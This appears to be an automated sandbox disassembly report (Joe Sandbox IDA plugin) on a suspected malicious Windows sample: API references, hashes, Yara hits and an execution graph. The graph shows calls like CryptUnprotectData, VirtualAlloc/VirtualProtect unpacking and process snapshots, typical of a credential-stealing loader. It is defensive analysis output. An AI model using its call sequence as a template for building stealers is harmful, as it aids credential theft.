                                                                                                    • API String ID: 3000768030-1691372216
                                                                                                    • Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                    • Instruction ID: 9875bc295672454492d04964ad4796884c43b126410369cfab48893691dd09dc
                                                                                                    • Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                    • Instruction Fuzzy Hash: 4B11D5B550474146DB304E3E8C88763BA94AFDA334F38276BD0B6936F1C22CE9829649
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00674B72
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00674B84
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleType
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 3000768030-1691372216
                                                                                                    • Opcode ID: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                    • Instruction ID: 70ae2b7dadc0cd3b78a0ad9431f70ef5d348e2f0f46ca94c6959bef45dba3ae6
                                                                                                    • Opcode Fuzzy Hash: 7171badc876e31ce258b26ae34af4b18c700b464fcfd6ccc7b7e3bb638240117
                                                                                                    • Instruction Fuzzy Hash: 1911B73150475186C7304E7D8C8C762BA96EB56B31B38472AE0BEC76F2CB20DD86D245
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 269201875-1691372216
                                                                                                    • Opcode ID: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
                                                                                                    • Instruction ID: eb719cc1bfb6819218d089f87952d2fc75fd927a7e25ce3d54c3d3c6ae1b4b1e
                                                                                                    • Opcode Fuzzy Hash: ebce9d5c91b3d956de1d8ff8f87ab7d1476279e4ec14c59c740c308a46226624
                                                                                                    • Instruction Fuzzy Hash: 8E11D671B003105ED7209F2DBC81B5A3AA4AB94765F240637F920CA3D1D378D9864B8D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 269201875-1691372216
                                                                                                    • Opcode ID: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
                                                                                                    • Instruction ID: b333848db6097c3307275e1dceebab05dbbd302661df8aa5f3fbb9d310745b37
                                                                                                    • Opcode Fuzzy Hash: 1e45f9f31c81076afc210aa4e6c3c8456cebbdc50b4c4a77426141023d54f72a
                                                                                                    • Instruction Fuzzy Hash: 4711B971A00B105FEB209B3DAC85B6536A65B80771F244237F559CB3D1D774D9864BC8
                                                                                                    APIs
                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodersGdipImage$Size
                                                                                                    • String ID: image/png
                                                                                                    • API String ID: 864223233-2966254431
                                                                                                    • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                    • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                    • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                    • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 1452528299-2698495834
                                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                    • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                    • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00642BF6
                                                                                                    • __fassign.LIBCMT ref: 00642C06
                                                                                                      • Part of subcall function 00642A8A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00642B6D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                    • String ID: {-d
                                                                                                    • API String ID: 2843524283-3440419085
                                                                                                    • Opcode ID: 26a2aefc81d30bc219ef6623b137fa36f09c6ad660d0dc0b6a69c96c45286d44
                                                                                                    • Instruction ID: a11e03356bb7d7fe9930c6a73c22f578d89e30b0ba65593c26e0d9b866674e67
                                                                                                    • Opcode Fuzzy Hash: 26a2aefc81d30bc219ef6623b137fa36f09c6ad660d0dc0b6a69c96c45286d44
                                                                                                    • Instruction Fuzzy Hash: D401D2B1D0011C5ACB68EA24DC52AEE777ADB45300F1041E9F605D2282D9719E86CA94
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                    • DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
                                                                                                    • _free.LIBCMT ref: 0043569E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DeleteEnter_free
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 1836352639-1691372216
                                                                                                    • Opcode ID: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
                                                                                                    • Instruction ID: 52a1ea267b11448604aac72e837bb79cf4a64da9af37325288c97695b126f8a5
                                                                                                    • Opcode Fuzzy Hash: db160195e1fd4a8d749b4a78d4a01c3657d349e12daedf425722546a29bf1eef
                                                                                                    • Instruction Fuzzy Hash: 4E118E715003149FDB10DF99D882B5D77B0AB0832AFA1402BE855DB2A2CB78E8428F48
                                                                                                    APIs
                                                                                                      • Part of subcall function 0066E654: RtlEnterCriticalSection.NTDLL(001F0DAF), ref: 0066E663
                                                                                                    • RtlDeleteCriticalSection.NTDLL(xYn), ref: 006758F7
                                                                                                    • _free.LIBCMT ref: 00675905
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DeleteEnter_free
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 1836352639-1691372216
                                                                                                    • Opcode ID: 59c47195f351c36be380176e98d2262bba69c405ac49a13f79cd5213aac7aaf8
                                                                                                    • Instruction ID: bad583a2e56bab3113272bc1df27447f0306ba195ae8c10e9e4cc48d695b5ba9
                                                                                                    • Opcode Fuzzy Hash: 59c47195f351c36be380176e98d2262bba69c405ac49a13f79cd5213aac7aaf8
                                                                                                    • Instruction Fuzzy Hash: 76116135900714DFDB10DF98D886B5C77B1AF44322F2081AAE456EB3A3CBB4E906CB19
                                                                                                    APIs
                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___std_exception_destroy
                                                                                                    • String ID: F(@$ios_base::failbit set
                                                                                                    • API String ID: 4194217158-1828034088
                                                                                                    • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                    • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                    • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                    • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_catch
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 3886170330-2084237596
                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                    • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                    APIs
                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                      • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                      • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                      • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                      • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: F@
                                                                                                    • API String ID: 2118720939-885931407
                                                                                                    • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                    • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                    • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                    • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                    APIs
                                                                                                    • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                      • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                    Strings
                                                                                                    • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                    • String ID: Access violation - no RTTI data!
                                                                                                    • API String ID: 2053020834-2158758863
                                                                                                    • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                    • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                    • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                    • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0043562E: DeleteCriticalSection.KERNEL32(0045A150,?,?,?,?,00457BD8,00000010,0042CA7A), ref: 00435690
                                                                                                      • Part of subcall function 0043562E: _free.LIBCMT ref: 0043569E
                                                                                                      • Part of subcall function 00433669: _free.LIBCMT ref: 0043368B
                                                                                                    • DeleteCriticalSection.KERNEL32(006E5958), ref: 0042CA96
                                                                                                    • _free.LIBCMT ref: 0042CAAA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$CriticalDeleteSection
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 1906768660-1691372216
                                                                                                    • Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                    • Instruction ID: 096468770cdb8f5f473685e72dce597222f10a1d1bc444d33569d92b2b8518b1
                                                                                                    • Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                    • Instruction Fuzzy Hash: C1E012329107249FD621AF5EF885A5E7BB49B8D356B61443BF40592162CA24AD058B4C
                                                                                                    APIs
                                                                                                      • Part of subcall function 00675895: RtlDeleteCriticalSection.NTDLL(xYn), ref: 006758F7
                                                                                                      • Part of subcall function 00675895: _free.LIBCMT ref: 00675905
                                                                                                      • Part of subcall function 006738D0: _free.LIBCMT ref: 006738F2
                                                                                                    • RtlDeleteCriticalSection.NTDLL(xYn), ref: 0066CCFD
                                                                                                    • _free.LIBCMT ref: 0066CD11
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$CriticalDeleteSection
                                                                                                    • String ID: xYn
                                                                                                    • API String ID: 1906768660-1691372216
                                                                                                    • Opcode ID: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                    • Instruction ID: 12a062fbfedad6483c0c561c9be832cdd6561efa2103407b923902684244bc5a
                                                                                                    • Opcode Fuzzy Hash: 84ffdb06902986eb4edad804c19bd0094c19007ef6f4e4d27e0fc387f4f61256
                                                                                                    • Instruction Fuzzy Hash: 92E0D8328107209FC6606B58FC8555637B69F89321731403AF409C3222CB30ED058B4D
                                                                                                    APIs
                                                                                                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                    • String ID: zB$~B
                                                                                                    • API String ID: 3275300208-395995950
                                                                                                    • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                    • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                    • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                    • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                    APIs
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                    • String ID: pThreadProxy
                                                                                                    • API String ID: 1687795959-3651400591
                                                                                                    • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                    • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                    • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                    • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CommandLine
                                                                                                    • String ID: &l
                                                                                                    • API String ID: 3253501508-1676360395
                                                                                                    • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                    • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                                    • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                    • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                    • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                    • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                    • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00642AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00642AAD,00000000), ref: 0066B187
                                                                                                    • GetLastError.KERNEL32 ref: 0066B195
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00642AAD,00000000), ref: 0066B1F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                    • Instruction ID: afc41632979cac9882f0db5c7eb79e442b59ce2e276a7c84551150cc612f84d3
                                                                                                    • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                    • Instruction Fuzzy Hash: EB410731600216EFCF218F64CC646FEBBEAEF42710F245169E859E72A1DB308E81C764

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.7%
                                                                                                    Dynamic/Decrypted Code Coverage:20.9%
                                                                                                    Signature Coverage:25.9%
                                                                                                    Total number of Nodes:139
                                                                                                    Total number of Limit Nodes:11
                                                                                                    execution_graph 27423 408a60 27425 408a6f 27423->27425 27424 408d05 ExitProcess 27425->27424 27426 408a84 GetCurrentProcessId GetCurrentThreadId 27425->27426 27434 408ce9 27425->27434 27427 408ac3 SHGetSpecialFolderPathW GetForegroundWindow 27426->27427 27428 408abd 27426->27428 27429 408b95 27427->27429 27428->27427 27429->27429 27435 4404b0 27429->27435 27431 408c27 27432 408cee 27431->27432 27438 40d400 CoInitializeEx 27431->27438 27432->27434 27434->27424 27434->27432 27439 443770 27435->27439 27437 4404ba RtlAllocateHeap 27437->27431 27440 4437a0 27439->27440 27440->27437 27440->27440 27366 4423c5 GetForegroundWindow 27370 444110 27366->27370 27368 4423d1 GetForegroundWindow 27369 4423ec 27368->27369 27371 444124 27370->27371 27371->27368 27371->27371 27446 40daa3 27447 40dad0 27446->27447 27450 43d0d0 27447->27450 27449 40dc55 27451 43d120 27450->27451 27451->27451 27452 43d529 CoCreateInstance 27451->27452 27453 43d585 SysAllocString 27452->27453 27454 43db6d 27452->27454 27457 43d62c 27453->27457 27456 43db7d GetVolumeInformationW 27454->27456 27463 43db9b 27456->27463 27458 43d634 CoSetProxyBlanket 27457->27458 27459 43db5c SysFreeString 27457->27459 27460 43db52 27458->27460 27461 43d654 SysAllocString 27458->27461 27459->27454 27460->27459 27464 43d740 27461->27464 27463->27449 27464->27464 27465 43d764 SysAllocString 27464->27465 27467 43d78a 27465->27467 27466 43db39 SysFreeString SysFreeString 27466->27460 27467->27466 27468 43db2f 27467->27468 27469 43d7ce VariantInit 27467->27469 27468->27466 27471 43d850 27469->27471 27470 43db1e VariantClear 27470->27468 27471->27470 27472 418ba2 27474 418c10 27472->27474 27473 418fb7 27474->27473 27475 445260 LdrInitializeThunk 27474->27475 27475->27474 27476 442020 27477 442038 27476->27477 27478 44205a 27476->27478 27481 442060 27476->27481 27480 44204b RtlReAllocateHeap 27477->27480 27477->27481 27479 4404b0 RtlAllocateHeap 27478->27479 27479->27481 27480->27481 27482 4404e2 27483 4404f0 27482->27483 27484 4404f2 27482->27484 27485 4404f7 RtlFreeHeap 27484->27485 27372 2080000 27375 2080006 27372->27375 27376 2080015 27375->27376 27379 20807a6 27376->27379 27380 20807c1 27379->27380 27381 20807ca CreateToolhelp32Snapshot 27380->27381 27382 20807e6 Module32First 27380->27382 27381->27380 27381->27382 27383 2080005 27382->27383 27384 20807f5 27382->27384 27386 2080465 27384->27386 27387 2080490 27386->27387 27388 20804d9 27387->27388 27389 20804a1 VirtualAlloc 27387->27389 27388->27388 27389->27388 27486 4180f0 27486->27486 27487 4180f8 27486->27487 27488 418468 CryptUnprotectData 27487->27488 27390 421710 27391 42171e 27390->27391 27395 421778 27390->27395 27396 421830 27391->27396 27397 421840 27396->27397 27397->27397 27400 445260 27397->27400 27399 421971 27402 445280 27400->27402 27401 44536e 27401->27399 27402->27401 27404 442080 LdrInitializeThunk 27402->27404 27404->27401 27489 421b30 27501 4450f0 27489->27501 27491 42228c 27492 421b77 27492->27491 27493 4404b0 RtlAllocateHeap 27492->27493 27494 421bd2 27493->27494 27500 421be9 27494->27500 27505 442080 LdrInitializeThunk 27494->27505 27496 4404b0 RtlAllocateHeap 27496->27500 27497 421cb9 27497->27491 27507 442080 LdrInitializeThunk 27497->27507 27500->27496 27500->27497 27506 442080 LdrInitializeThunk 27500->27506 27502 445110 27501->27502 27503 445208 27502->27503 27508 442080 LdrInitializeThunk 27502->27508 27503->27492 27505->27494 27506->27500 27507->27497 27508->27503 27509 40d433 CoInitializeSecurity 27405 445450 27406 44548f 27405->27406 27407 445469 27405->27407 27407->27406 27411 442080 LdrInitializeThunk 27407->27411 27409 4454b8 27409->27406 27412 442080 LdrInitializeThunk 27409->27412 27411->27409 27412->27406 27413 444210 27415 444230 27413->27415 27414 4442af 27415->27414 27417 442080 LdrInitializeThunk 27415->27417 27417->27414 27510 4425f2 27511 442602 27510->27511 27513 44261e 27510->27513 27511->27513 27514 442080 LdrInitializeThunk 27511->27514 27514->27513 27515 20b003c 27516 20b0049 27515->27516 27530 20b0e0f SetErrorMode SetErrorMode 27516->27530 27521 20b0265 27522 20b02ce VirtualProtect 27521->27522 27524 20b030b 27522->27524 27523 20b0439 VirtualFree 27528 20b05f4 LoadLibraryA 27523->27528 27529 20b04be 27523->27529 27524->27523 27525 20b04e3 LoadLibraryA 27525->27529 27527 20b08c7 27528->27527 27529->27525 27529->27528 27531 20b0223 27530->27531 27532 20b0d90 27531->27532 27533 20b0dad 27532->27533 27534 20b0dbb GetPEB 27533->27534 27535 20b0238 VirtualAlloc 27533->27535 27534->27535 27535->27521 27541 40ebff 27543 40ec5f 27541->27543 27544 40ec7e 27541->27544 27542 40ed2e 27543->27544 27548 442080 LdrInitializeThunk 27543->27548 27544->27542 27547 442080 LdrInitializeThunk 27544->27547 27547->27542 27548->27544 27549 442b3b 27550 442b45 27549->27550 27550->27550 27551 442c0e 27550->27551 27553 442080 LdrInitializeThunk 27550->27553 27553->27551

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
